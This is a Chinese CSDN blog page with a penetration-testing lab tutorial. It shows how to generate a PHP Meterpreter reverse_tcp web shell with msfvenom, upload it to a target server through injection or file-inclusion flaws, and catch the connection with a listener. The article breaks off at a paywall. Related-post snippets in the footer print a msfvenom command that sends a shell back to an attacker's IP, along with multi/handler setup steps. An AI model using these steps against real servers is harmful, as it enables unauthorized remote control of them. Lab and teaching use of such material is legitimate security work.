PHP Meterpreter后门

最新推荐文章于 2022-07-11 07:34:00 发布
最新推荐文章于 2022-07-11 07:34:00 发布
阅读量1.5k 收藏 1
点赞数
文章标签: php linux shell web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Admin_Shell/article/details/104470724
版权

Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP Web shell。利用目标的漏洞(常见的注入和上传漏洞)之后,再把它的shell传到目标主机即可。

实验环境

系统:Kali2019
iP地址:192.168.1.15
使用工具: PHP Meterpreter

**目标主机
系统:Windows2008
iP地址:192.168.1.14

任务实施

使用Metasploit的msfvenom工具制作PHP Meterpreter**
制作PHP Meterpreter

-p:指定payload为php/meterpreter/reverse_tcp
-f:设置输出格式(raw)
LPORT:设定连接端口(默认4444)
LHOST:设定攻击主机的IP地址

完成以上操作后可使用ls查看后门文件是否生成成功
在这里插入图片描述
在通过正常途径,或者利用注入、远程文件包含漏洞等Web漏洞之后,将test2.php后门文件上传到目标服务器,接着启动msfconsole,使用以下命令设置监听。

最低0.47元/天 解锁文章
Admin_Shell
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
获取meterpreter权限后如何留后门
黑锤的博客
09-21 2186
我们知道当我们拿到主机meterpreter权限是可以留后门进行持久化攻击,常见的cmd命令 创建文本,并向里出入内容,并打开: echo "hello I am hacker" >>1.txt 之后再打开:notepad 1.txt即可 拿永恒之蓝来说得到meterpreter后想要利用3389进行远程登录就得需要用户账号密码,一下有两种方法创建账号 方法一:利用msf的post后渗透攻击模块直接在 直接在meterpreter下创建,这种创建的账号直接就是administrat
Metasploit应用笔记-msfvenom生成meterpreter后门代码
oneVs1的专栏
02-28 1万+
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c
php Meterpreter Webshell
iteye_16188的博客
11-17 373
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php 2. 上传a.php到web服务器 3. 启动msfconsole 4. use multi/handler 5. set LHOST Attacker's_IP 6. set LPORT 443 7. set ...
Metasploit 生成各种后门
CSDN
01-13 1万+
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
Meterpreter使用总结(1)
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
php后门URL的防范
10-26
PHP编程中,后门URL是一个严重的安全问题,它允许未经授权的用户通过URL直接访问原本应受到保护的资源。这通常发生在开发过程中,由于配置不当或疏忽,使得原本不应暴露的文件可以直接被浏览器访问。在给定的描述...
Php后门php 后门
06-25
php 后门
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
一些 PHP 管理系统程序中的后门
10-29
一些php网站管理程序的,一些后门,其实官方也没有恶意,主要是大家为了自己的安全。
php万能后门程序
09-11
PHP万能后门程序是一种恶意代码,用于非法获取对服务器的远程访问权限。它通常被黑客用来绕过安全措施,执行任意系统命令,上传或下载文件,甚至控制系统。在这个描述中,提到的“php万能后门操作类”可能是一个自...
apache virtualhost 访问不了_Meterpreter执行不了shell原因
weixin_35779370的博客
12-28 301
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
msf payload php,Metasploit(四)--Msfpayload命令
weixin_32304785的博客
03-11 496
msfpayload即将在2015年6月18日弃用,用msfvenmon替代msfpayload-hmsfpayload的帮助信息。msfpayload-l|grepwindowsmsfpayload-l|greplinuxmsfpayload-l|grepandriod列出某个平台的pyloadsmsfpayloadwindows/meterpreter/bind_t...
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5591
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
Meterpreter命令详解
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3847
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
渗透之——Metasploit渗透php-utility-belt程序
冰河的专栏
01-17 1594
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86526103 攻击机 kali 192.168.109.137 靶机:Win XP 192.168.109.141 应用程序 php-utility-belt (可以到链接:https://download.csdn.net/download/l1028386804/109...
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3286
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
利用Metasploit对PHP5.2.4渗透测试提权
渗透测试
05-06 1656
文章目录前言一、启动metasploit数据库二、PHP5.2.4渗透测试1.设置相关渗透模块2.提权总结 前言 针对PHP5.2.4进行渗透测试提权 一、启动metasploit数据库 启动metasploit在上一篇文章已经详细介绍 利用db_nmap扫描到的结果,在进行services -u 过滤结果 msf6 > services -u Services ======== host port proto name state info --
php源码扫描后门工具
最新发布
01-23
PHP源码扫描后门工具是一种可以帮助开发者检测PHP源代码中是否存在后门的工具。这种工具通常会使用静态代码分析技术,对PHP源码进行深入扫描和分析,以便找出可能存在的后门代码或者安全漏洞。 这种工具的工作原理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值